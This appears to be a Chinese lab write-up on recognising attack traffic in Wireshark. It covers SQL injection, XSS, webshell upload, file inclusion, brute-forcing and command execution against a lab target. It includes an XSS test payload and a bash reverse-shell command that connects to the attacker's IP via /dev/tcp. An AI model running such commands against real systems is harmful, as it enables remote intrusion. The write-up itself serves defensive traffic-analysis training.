环境:
流量分析工具:Wireshark
靶机ip:10.4.7.130
攻击机IP:10.4.7.138
流量分析
SQL注入
使用order by判断列数
wireshark抓包
order by 15成功,order by 16失败,说明列数为15 选择追踪流
抓到关键字order by 16
XSS
搜索框输入
<script>alert(1)</script>
出现弹窗
WireShark抓包,抓到关键字script alert
文件上传
上传一句话木马文件
WireShark抓包
文件包含
访问phpinfo文件WireShark抓包
密码爆破
bp抓包
bp密码爆破
WireShark流量分析
发现大量登陆信息
命令执行
攻击机
WireShark抓包
反弹shell
kali 监听
Centos 7输入反弹shell指令
bash -i >& /dev/tcp/10.4.7.138/8888 0>&1
在kali中可以看到反弹shell到了Centos 7输入反弹shell的路径下
在wireshark中看到 追踪流看到反弹shell的路径kali中输入 ls ,再次追踪流,查看到命令